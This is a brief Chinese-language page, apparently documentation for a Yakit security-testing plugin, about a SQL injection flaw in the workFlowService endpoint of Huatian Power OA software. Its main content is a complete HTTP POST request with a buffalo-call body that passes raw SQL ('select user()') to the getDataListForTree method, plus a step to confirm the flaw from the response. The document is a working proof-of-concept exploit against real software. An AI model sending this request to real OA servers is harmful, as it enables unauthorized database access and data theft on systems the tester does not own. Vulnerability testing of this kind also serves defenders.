华天动力OA插件使用
#
1 workFlowService SQL注入漏洞插件id:
Yakit正在努力编写~
测试过程:
测试网站构造恶意请求包发送
POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1Host: xx.xx.xx.xxAccept-Encoding: identityContent-Length: 103Accept-Language: zh-CN,zh;q=0.8Accept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3Connection: keep-aliveCache-Control: max-age=0
<buffalo-call> <method>getDataListForTree</method> <string>select user()</string> </buffalo-call>
查看响应包,确认漏洞